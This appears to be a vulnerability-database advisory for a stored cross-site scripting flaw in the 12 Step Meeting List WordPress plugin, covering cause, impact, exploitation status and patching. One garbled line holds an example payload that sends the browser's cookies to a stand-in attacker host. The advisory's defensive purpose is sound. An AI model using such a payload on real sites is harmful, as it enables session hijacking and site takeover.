
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-78333 is an unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in the 12 Step Meeting List WordPress plugin, affecting versions 3.17 through 3.19.16. The flaw allows unauthenticated attackers to inject malicious scripts via a geocode event log value that is stored in the plugin's activity log and later rendered in the WordPress admin area. It was publicly disclosed on August 25, 2026, with a patch released in version 3.19.17. The vulnerability carries a CVSS score of 8.8 (High) per WPScan, and is classified under CWE-79 (WPScan, Github Advisory).
The root cause is improper input sanitization and output escaping (CWE-79): the plugin fails to sanitize a user-supplied value — specifically related to geocode data submitted during meeting list interactions — before storing it in its activity log. When an administrator views the activity log page in the WordPress admin area, the unsanitized value is rendered directly in the browser, triggering execution of any injected JavaScript. Because the submission endpoint is accessible to unauthenticated users, no authentication or special privileges are required to plant the payload. A proof-of-concept is scheduled for public release on September 25, 2026, giving site operators time to patch (WPScan).
Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the browser of any high-privilege user (e.g., WordPress administrator) who views the affected admin area page. This can lead to session hijacking, credential theft, unauthorized administrative actions (such as creating rogue admin accounts or installing malicious plugins), and full site compromise. The stored nature of the attack means the payload persists and executes for every admin who views the log, amplifying the potential impact (WPScan, Github Advisory).
There is currently no public proof-of-concept exploit available; WPScan has indicated the PoC will be released on September 25, 2026. No evidence of in-the-wild exploitation has been reported at this time. The EPSS score is 0.0, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog. The low barrier to exploitation — requiring no authentication — makes this a notable risk once a PoC becomes public (WPScan, Github Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) to be injected into the geocode-related input field.Update the 12 Step Meeting List WordPress plugin to version 3.19.17 or later, which addresses the sanitization and escaping deficiencies. No official workaround short of patching has been published; as an interim measure, administrators should restrict access to the WordPress admin area using IP allowlisting or HTTP authentication. Sites should also audit their activity logs for suspicious entries and review recently created admin accounts or installed plugins for signs of prior exploitation (WPScan, Github Advisory).
The vulnerability was discovered and reported by security researcher Huseyn and verified by WPScan. No notable broader media coverage or significant social media discussion has been identified at this time, consistent with the early disclosure stage and the absence of a public PoC (WPScan).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."